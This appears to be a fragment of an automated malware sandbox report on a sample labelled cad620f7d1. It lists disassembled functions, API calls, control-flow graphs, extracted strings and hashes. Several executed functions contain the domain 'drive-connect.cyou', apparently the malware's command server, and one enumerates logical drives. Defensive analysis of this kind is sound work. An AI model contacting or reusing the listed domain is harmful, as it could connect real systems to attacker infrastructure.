                                                                                                                                                                                                • Associated: 0000001F.00000002.2708269704.0000000000D51000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2714355102.0000000000D53000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_31_2_d30000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 158306478-0
                                                                                                                                                                                                • Opcode ID: 73a6924b152cdb9f6fc0de7b6daa198ab6f8d60a5a702f4ed6e04f9e7895ff7c
                                                                                                                                                                                                • Instruction ID: 15c7f0635477ed258dc5a9096bb136459cf5190c6b476d03e19e9b972425d383
                                                                                                                                                                                                • Opcode Fuzzy Hash: 73a6924b152cdb9f6fc0de7b6daa198ab6f8d60a5a702f4ed6e04f9e7895ff7c
                                                                                                                                                                                                • Instruction Fuzzy Hash: C511D2F66026197F67213BB5ACC9C6F7B6CDE893A5F180425F945D22C1FE60DD0181B1
                                                                                                                                                                                                Function 00D4429C Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,00D4311E,00000000,00000001,?,?,?,00D3FC5E,?,00000000,00000000), ref: 00D442B3
                                                                                                                                                                                                • GetLastError.KERNEL32(?,00D4311E,00000000,00000001,?,?,?,00D3FC5E,?,00000000,00000000,?,?,?,00D3F5A4,?), ref: 00D442BF
                                                                                                                                                                                                  • Part of subcall function 00D44310: CloseHandle.KERNEL32(FFFFFFFE,00D442CF,?,00D4311E,00000000,00000001,?,?,?,00D3FC5E,?,00000000,00000000,?,?), ref: 00D44320
                                                                                                                                                                                                • ___initconout.LIBCMT ref: 00D442CF
                                                                                                                                                                                                  • Part of subcall function 00D442F1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00D4428D,00D4310B,?,?,00D3FC5E,?,00000000,00000000,?), ref: 00D44304
                                                                                                                                                                                                • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,00D4311E,00000000,00000001,?,?,?,00D3FC5E,?,00000000,00000000,?), ref: 00D442E4
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001F.00000002.2704400368.0000000000D31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00D30000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001F.00000002.2703746142.0000000000D30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2705213247.0000000000D46000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2706480899.0000000000D4E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2707415666.0000000000D4F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2708269704.0000000000D51000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2714355102.0000000000D53000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_31_2_d30000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2744216297-0
                                                                                                                                                                                                • Opcode ID: 8fdcd4a2f7e00768a34cc0898601079cf99a0d6bdd5120604c11b8aca1e4d942
                                                                                                                                                                                                • Instruction ID: dd2495967436befaa9fc503a079debc415a207b44e842d11919d18b035425e4a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8fdcd4a2f7e00768a34cc0898601079cf99a0d6bdd5120604c11b8aca1e4d942
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1CF0AC3B511215BBCF621FE6DC48A9A3F26FF4A7A1B144520FA18D5230CB7298609BB4
                                                                                                                                                                                                Function 00D338D1 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00D338E3
                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00D338F2
                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00D338FB
                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 00D33908
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001F.00000002.2704400368.0000000000D31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00D30000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001F.00000002.2703746142.0000000000D30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2705213247.0000000000D46000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2706480899.0000000000D4E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2707415666.0000000000D4F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2708269704.0000000000D51000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2714355102.0000000000D53000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_31_2_d30000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                • Opcode ID: d7de03136f2640095264eba7755316a81066e33b81b8f7dfa9938d5bb3b0c5ab
                                                                                                                                                                                                • Instruction ID: 0483b386826aaad6055d2284537a675b1bceffcf217a89dd3b3a5f45127d553e
                                                                                                                                                                                                • Opcode Fuzzy Hash: d7de03136f2640095264eba7755316a81066e33b81b8f7dfa9938d5bb3b0c5ab
                                                                                                                                                                                                • Instruction Fuzzy Hash: FCF05F75D1120DEBCB40DFB4D98999EBBF4EF1D200B9155A5A412E6210EB30AB449B60
                                                                                                                                                                                                Function 00D392ED Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 125COMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00D391EE,?,?,00000000,00000000,00000000,?), ref: 00D39312
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001F.00000002.2704400368.0000000000D31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00D30000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001F.00000002.2703746142.0000000000D30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2705213247.0000000000D46000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2706480899.0000000000D4E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2707415666.0000000000D4F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2708269704.0000000000D51000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2714355102.0000000000D53000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_31_2_d30000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: EncodePointer
                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                • API String ID: 2118026453-2084237596
                                                                                                                                                                                                • Opcode ID: 71dd7408239dba4d85b47d1eccf8b6e375fcaa8443b01165946fe2301a34c7a4
                                                                                                                                                                                                • Instruction ID: 8607569f95c81f705a0f586ed9607393637d8f9a145b19bb149c3db28934c167
                                                                                                                                                                                                • Opcode Fuzzy Hash: 71dd7408239dba4d85b47d1eccf8b6e375fcaa8443b01165946fe2301a34c7a4
                                                                                                                                                                                                • Instruction Fuzzy Hash: DE415872900209EFCF15DF98CD91AEEBBB5FF48300F1880A9FA05A7251D375A951DB64
                                                                                                                                                                                                Function 00D38B59 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00D38DD0
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001F.00000002.2704400368.0000000000D31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00D30000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001F.00000002.2703746142.0000000000D30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2705213247.0000000000D46000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2706480899.0000000000D4E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2707415666.0000000000D4F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2708269704.0000000000D51000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2714355102.0000000000D53000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_31_2_d30000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ___except_validate_context_record
                                                                                                                                                                                                • String ID: csm$csm
                                                                                                                                                                                                • API String ID: 3493665558-3733052814
                                                                                                                                                                                                • Opcode ID: 581f87a23334e250d7ddef9443a3373cb7533a0ae1c0fda66a6a62e8044b0ec4
                                                                                                                                                                                                • Instruction ID: cf05924066ce69a2e4b445a06318471866ddc86a69a339a4fbbcf2a44a6884ac
                                                                                                                                                                                                • Opcode Fuzzy Hash: 581f87a23334e250d7ddef9443a3373cb7533a0ae1c0fda66a6a62e8044b0ec4
                                                                                                                                                                                                • Instruction Fuzzy Hash: EE31B076800318ABCF269F54CC4496A7B76FF08719F18415AF8546A221CB33DDA1EBB1

                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                Function 00431BB0 Relevance: 47.4, APIs: 2, Strings: 25, Instructions: 179COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 0 431bb0-431c9c GetSystemMetrics * 2 6 431ca3-432087 0->6
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000024.00000002.3121825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_36_2_400000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: MetricsSystem
                                                                                                                                                                                                • String ID: $&)C$;(C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$='C$S%C$b(C$#C
                                                                                                                                                                                                • API String ID: 4116985748-628680385
                                                                                                                                                                                                • Opcode ID: c4360614f8f82c5e27f19abdd04c6f864ef0af49341f313285d7bdd33a848109
                                                                                                                                                                                                • Instruction ID: ea45c71986b2e534ecec44a4126f62931ddcc8577b73b097e58ed3aa899a90b6
                                                                                                                                                                                                • Opcode Fuzzy Hash: c4360614f8f82c5e27f19abdd04c6f864ef0af49341f313285d7bdd33a848109
                                                                                                                                                                                                • Instruction Fuzzy Hash: 41B16FB04097818FE771DF14D48879BBBE0BBC5308F508A2EE5E89B251CBB95448CF86
                                                                                                                                                                                                Function 0040E2A9 Relevance: 14.0, APIs: 2, Strings: 7, Instructions: 529COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 214 40e2a9-40e2d1 call 4097b0 CoUninitialize 217 40e2e0-40e2f4 214->217 217->217 218 40e2f6-40e307 217->218 219 40e310-40e331 218->219 219->219 220 40e333-40e38e 219->220 221 40e390-40e3aa 220->221 221->221 222 40e3ac-40e3bd 221->222 223 40e3db-40e3e3 222->223 224 40e3bf-40e3cf 222->224 225 40e3e5-40e3e6 223->225 226 40e3fb-40e405 223->226 227 40e3d0-40e3d9 224->227 228 40e3f0-40e3f9 225->228 229 40e407-40e40b 226->229 230 40e41b-40e423 226->230 227->223 227->227 228->226 228->228 231 40e410-40e419 229->231 232 40e425-40e426 230->232 233 40e43b-40e445 230->233 231->230 231->231 234 40e430-40e439 232->234 235 40e447-40e44b 233->235 236 40e45b-40e467 233->236 234->233 234->234 237 40e450-40e459 235->237 238 40e481-40e5b7 236->238 239 40e469-40e46b 236->239 237->236 237->237 240 40e5c0-40e5d8 238->240 241 40e470-40e47d 239->241 240->240 242 40e5da-40e5fb 240->242 241->241 243 40e47f 241->243 244 40e600-40e628 242->244 243->238 244->244 245 40e62a-40e68f call 40b6a0 call 4097b0 CoUninitialize 244->245 250 40e690-40e6a4 245->250 250->250 251 40e6a6-40e6b8 250->251 252 40e6c0-40e6e1 251->252 252->252 253 40e6e3-40e73e 252->253 254 40e740-40e75a 253->254 254->254 255 40e75c-40e76d 254->255 256 40e77b-40e783 255->256 257 40e76f 255->257 258 40e785-40e786 256->258 259 40e79b-40e7a5 256->259 260 40e770-40e779 257->260 261 40e790-40e799 258->261 262 40e7a7-40e7ab 259->262 263 40e7bb-40e7c3 259->263 260->256 260->260 261->259 261->261 264 40e7b0-40e7b9 262->264 265 40e7c5-40e7c6 263->265 266 40e7db-40e7e5 263->266 264->263 264->264 267 40e7d0-40e7d9 265->267 268 40e7e7-40e7eb 266->268 269 40e7fb-40e807 266->269 267->266 267->267 270 40e7f0-40e7f9 268->270 271 40e821-40e948 269->271 272 40e809-40e80b 269->272 270->269 270->270 273 40e950-40e96a 271->273 274 40e810-40e81d 272->274 273->273 275 40e96c-40e98f 273->275 274->274 276 40e81f 274->276 277 40e990-40e9b9 275->277 276->271 277->277 278 40e9bb-40e9e2 call 40b6a0 277->278 280 40e9e7-40e9fd 278->280
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000024.00000002.3121825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_36_2_400000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Uninitialize
                                                                                                                                                                                                • String ID: "# `$,$I~$`~$drive-connect.cyou$qx$s
                                                                                                                                                                                                • API String ID: 3861434553-1359720996
                                                                                                                                                                                                • Opcode ID: 1bc8a25b561593e53d2d6339a02d65ee242e64d661e98e766194f6cca9f4be8c
                                                                                                                                                                                                • Instruction ID: 550626b1aa1881637dc35d229a9c1637f44e71d1f63aa888f187a22684203b49
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1bc8a25b561593e53d2d6339a02d65ee242e64d661e98e766194f6cca9f4be8c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2902B0B010C3D18BD3358F2684A07EBBFE1EF92304F189DADD4DA6B252D679040A8B57
                                                                                                                                                                                                Function 004233A0 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 471COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 281 4233a0-4233ef 282 4233f0-423402 281->282 282->282 283 423404-423445 282->283 285 423450-42347c 283->285 285->285 286 42347e-423488 285->286 287 423610-42361d 286->287 288 423600-423607 286->288 289 4234c6 286->289 290 4234d7-4234e3 286->290 291 4234e4-4234f5 286->291 292 4237d5-42387f 286->292 293 4237ba 286->293 294 4237a8-4237b2 286->294 295 4234ce-4234d4 call 408000 286->295 296 42348f-423495 286->296 301 423626 287->301 302 42361f-423624 287->302 288->287 289->295 299 4234f7-4234fc 291->299 300 4234fe 291->300 297 423880-42389c 292->297 294->293 295->290 303 423497-42349c 296->303 304 42349e 296->304 297->297 305 42389e-4238ae call 4215f0 297->305 307 423500-423537 call 407ff0 299->307 300->307 308 42362d-4236d9 call 407ff0 301->308 302->308 309 4234a1-4234bf call 407ff0 303->309 304->309 314 4238b3-4238b6 305->314 318 423540-423585 307->318 319 4236e0-423724 308->319 309->287 309->288 309->289 309->290 309->291 309->292 309->293 309->294 309->295 320 4238be-4238db 314->320 318->318 321 423587-42358f 318->321 319->319 322 423726-42372e 319->322 324 4238e0-423904 320->324 325 4235b1-4235bd 321->325 326 423591-423596 321->326 327 423730-423737 322->327 328 423751-423761 322->328 324->324 331 423906-423989 324->331 333 4235e1-4235ec call 43d6c0 325->333 334 4235bf-4235c3 325->334 332 4235a0-4235af 326->332 335 423740-42374f 327->335 329 423763-423767 328->329 330 423781-4237a1 GetLogicalDrives call 43d6c0 328->330 337 423770-42377f 329->337 330->290 330->293 330->294 330->295 330->320 344 4237c0-4237c6 call 408000 330->344 345 4239f1-4239f7 call 408000 330->345 346 4239eb 330->346 347 4237cf 330->347 340 423990-4239be 331->340 332->325 332->332 341 4235f1-4235f9 333->341 336 4235d0-4235df 334->336 335->328 335->335 336->333 336->336 337->330 337->337 340->340 343 4239c0-4239e3 call 421270 340->343 341->287 341->288 341->292 341->293 341->294 341->320 341->344 343->346 344->347 346->345 347->292
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000024.00000002.3121825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_36_2_400000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: #R,T$$^<P$VW$]~"p$ij$KM
                                                                                                                                                                                                • API String ID: 0-788320361
                                                                                                                                                                                                • Opcode ID: 83f2170b8c59a65a8a9960c15d95f04e83c213860b07ad3303ead03e3c572ec6
                                                                                                                                                                                                • Instruction ID: 9ed236048ece28067beed024fb633757567cd4a7e3bca11c75bb2a7735f0e68b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 83f2170b8c59a65a8a9960c15d95f04e83c213860b07ad3303ead03e3c572ec6
                                                                                                                                                                                                • Instruction Fuzzy Hash: D1F1CAB46083509FD310DF65E88262BBBF1EFD5304F44892DE4958B351EB789A06CB4B
                                                                                                                                                                                                Function 0040A960 Relevance: 9.2, Strings: 7, Instructions: 401COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 354 40a960-40a989 355 40a990-40a9e5 354->355 355->355 356 40a9e7-40aadf 355->356 357 40aae0-40ab1b 356->357 357->357 358 40ab1d-40ab39 357->358 359 40ab40-40ab69 358->359 359->359 360 40ab6b-40ab7a call 40b6a0 359->360 362 40ab7f-40ab86 360->362 363 40ae29-40ae32 362->363 364 40ab8c-40ab98 362->364 365 40aba0-40abb2 364->365 365->365 366 40abb4-40abb9 365->366 367 40abc0-40abcc 366->367 368 40abd3-40abe4 367->368 369 40abce-40abd1 367->369 370 40ae20-40ae26 call 439b60 368->370 371 40abea-40abff 368->371 369->367 369->368 370->363 372 40ac00-40ac41 371->372 372->372 374 40ac43-40ac50 372->374 376 40ac52-40ac58 374->376 377 40ac84-40ac88 374->377 380 40ac67-40ac6b 376->380 378 40ae1e 377->378 379 40ac8e-40acb6 377->379 378->370 381 40acc0-40acf4 379->381 380->378 382 40ac71-40ac78 380->382 381->381 383 40acf6-40acff 381->383 384 40ac7a-40ac7c 382->384 385 40ac7e 382->385 386 40ad01-40ad0b 383->386 387 40ad34-40ad36 383->387 384->385 388 40ac60-40ac65 385->388 389 40ac80-40ac82 385->389 390 40ad17-40ad1b 386->390 387->378 391 40ad3c-40ad52 387->391 388->377 388->380 389->388 390->378 392 40ad21-40ad28 390->392 393 40ad60-40adb2 391->393 394 40ad2a-40ad2c 392->394 395 40ad2e 392->395 393->393 396 40adb4-40adbe 393->396 394->395 397 40ad10-40ad15 395->397 398 40ad30-40ad32 395->398 399 40adc0-40adc8 396->399 400 40adf4-40adf8 396->400 397->387 397->390 398->397 401 40add7-40addb 399->401 402 40adfe-40ae1c call 40a6d0 400->402 401->378 403 40addd-40ade4 401->403 402->370 405 40ade6-40ade8 403->405 406 40adea-40adec 403->406 405->406 408 40add0-40add5 406->408 409 40adee-40adf2 406->409 408->401 410 40adfa-40adfc 408->410 409->408 410->378 410->402
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000024.00000002.3121825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_36_2_400000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: #xDz$'D F$A|}~$N[\D$N[\D$kl$n
                                                                                                                                                                                                • API String ID: 0-490458541
                                                                                                                                                                                                • Opcode ID: b00241246f4d0228e6e25298a947675e85839165aeb9511d476d344b8fc49fad
                                                                                                                                                                                                • Instruction ID: 966b8f91f76bb20883ed88500b6b89ab0c93423946d56f050922860fedc986fe
                                                                                                                                                                                                • Opcode Fuzzy Hash: b00241246f4d0228e6e25298a947675e85839165aeb9511d476d344b8fc49fad
                                                                                                                                                                                                • Instruction Fuzzy Hash: D7C1267260C3504BC714CF6488905AFBBD3ABC2304F1E893DE9D56B382D679991AC78B
                                                                                                                                                                                                Function 0040CE55 Relevance: 9.0, Strings: 7, Instructions: 275COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 411 40ce55-40ce62 412 40ce70-40ce9b 411->412 412->412 413 40ce9d-40ced5 call 408720 call 436f90 412->413 418 40cee0-40cf06 413->418 418->418 419 40cf08-40cf6b 418->419 420 40cf70-40cfa7 419->420 420->420 421 40cfa9-40cfba 420->421 422 40cfc0-40cfcb 421->422 423 40d03d 421->423 424 40cfd0-40cfd9 422->424 425 40d041-40d049 423->425 424->424 426 40cfdb 424->426 427 40d05b-40d068 425->427 428 40d04b-40d04f 425->428 426->425 430 40d06a-40d071 427->430 431 40d08b-40d093 427->431 429 40d050-40d059 428->429 429->427 429->429 434 40d080-40d089 430->434 432 40d095-40d096 431->432 433 40d0ab-40d1c6 431->433 435 40d0a0-40d0a9 432->435 436 40d1d0-40d215 433->436 434->431 434->434 435->433 435->435 436->436 437 40d217-40d239 436->437 438 40d240-40d250 437->438 438->438 439 40d252-40d27f call 40b6a0 438->439 441 40d284-40d29e 439->441
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000024.00000002.3121825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_36_2_400000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: 07817FAAC2C8E9D223D904AF30EFEBBC$F^$I@$N~ :$VgfW$drive-connect.cyou$z@(
                                                                                                                                                                                                • API String ID: 0-2302594542
                                                                                                                                                                                                • Opcode ID: a8b82ccc30708ca5d3da64cc2461f8570c754c905fc98211d30cc89c72c56c70
                                                                                                                                                                                                • Instruction ID: b1d760c26d9b90ec4573806c6615211f8657e28aa76e89aec63d6860f5017e85
                                                                                                                                                                                                • Opcode Fuzzy Hash: a8b82ccc30708ca5d3da64cc2461f8570c754c905fc98211d30cc89c72c56c70
                                                                                                                                                                                                • Instruction Fuzzy Hash: A191EEB05083C18BD335CF25D8A0BEBBBE0AB96314F148D6DD4DD9B282D738454ACB96
                                                                                                                                                                                                Function 0040C36E Relevance: 6.5, Strings: 5, Instructions: 203COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 600 40c36e-40c559 601 40c560-40c58e 600->601 601->601 602 40c590-40c7ab 601->602 604 40c7b0-40c7de 602->604 604->604 605 40c7e0-40c7e8 604->605 606 40c7ec-40c7ff 605->606
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000024.00000002.3121825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_36_2_400000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: ){+}$4cde$CJ$F'k)$GS
                                                                                                                                                                                                • API String ID: 0-4192230409
                                                                                                                                                                                                • Opcode ID: 5de04a91f599762488a7f1befa48500976ff1de46b0c1ed8ec4e4c363fac47c6
                                                                                                                                                                                                • Instruction ID: 6afdb2316fdadaf12e32bd698f1912d34734f08b0bc4a82971b76fff6b28e520
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5de04a91f599762488a7f1befa48500976ff1de46b0c1ed8ec4e4c363fac47c6
                                                                                                                                                                                                • Instruction Fuzzy Hash: 50B11BB84053058FE354DF629688FAA7BB0FB25310F1A82E9E0992F776D7748405CF96
                                                                                                                                                                                                Function 00426170 Relevance: 5.3, Strings: 4, Instructions: 318COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 788 426170-42618f 789 426190-4261bf 788->789 789->789 790 4261c1-4261cd 789->790 791 426214-426221 790->791 792 4261cf-4261d7 790->792 793 426230-426283 791->793 794 4261e0-4261e7 792->794 793->793 797 426285-426289 793->797 795 4261f0-4261f6 794->795 796 4261e9-4261ec 794->796 795->791 799 4261f8-42620c call 43b480 795->799 796->794 798 4261ee 796->798 800 426310-426312 797->800 801 42628f-4262af call 439b40 797->801 798->791 805 426211 799->805 802 4264ef-4264f8 800->802 807 4262b0-4262df 801->807 805->791 807->807 808 4262e1-4262ed 807->808 809 426336-42633a 808->809 810 4262ef-4262f7 808->810 811 426340-426349 809->811 812 4264e6-4264ec call 439b60 809->812 813 426300-426307 810->813 816 426350-426365 811->816 812->802 814 426317-42631d 813->814 815 426309-42630c 813->815 814->809 819 42631f-42632e call 43b480 814->819 815->813 818 42630e 815->818 816->816 820 426367-426369 816->820 818->809 825 426333 819->825 823 426370-42637d call 407ff0 820->823 824 42636b 820->824 828 426390-42639a 823->828 824->823 825->809 829 426380-42638e 828->829 830 42639c-42639f 828->830 829->828 831 4263b3-4263b7 829->831 832 4263a0-4263af 830->832 834 4264dd-4264e3 call 408000 831->834 835 4263bd-4263c8 831->835 832->832 833 4263b1 832->833 833->829 834->812 836 4263ca-4263d1 835->836 837 42641b-426467 call 407ff0 call 408e90 835->837 839 4263ec-4263f0 836->839 851 426470-4264b8 837->851 843 4263f2-4263fb 839->843 844 4263e0 839->844 847 426410-426414 843->847 848 4263fd-426400 843->848 846 4263e1-4263ea 844->846 846->837 846->839 847->846 850 426416-426419 847->850 848->846 850->846 851->851 852 4264ba-4264d9 call 408ff0 call 408000 851->852 852->834
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000024.00000002.3121825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_36_2_400000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                • String ID: 4zVc$8zVc$YNMZ$cba`
                                                                                                                                                                                                • API String ID: 2994545307-1799417857
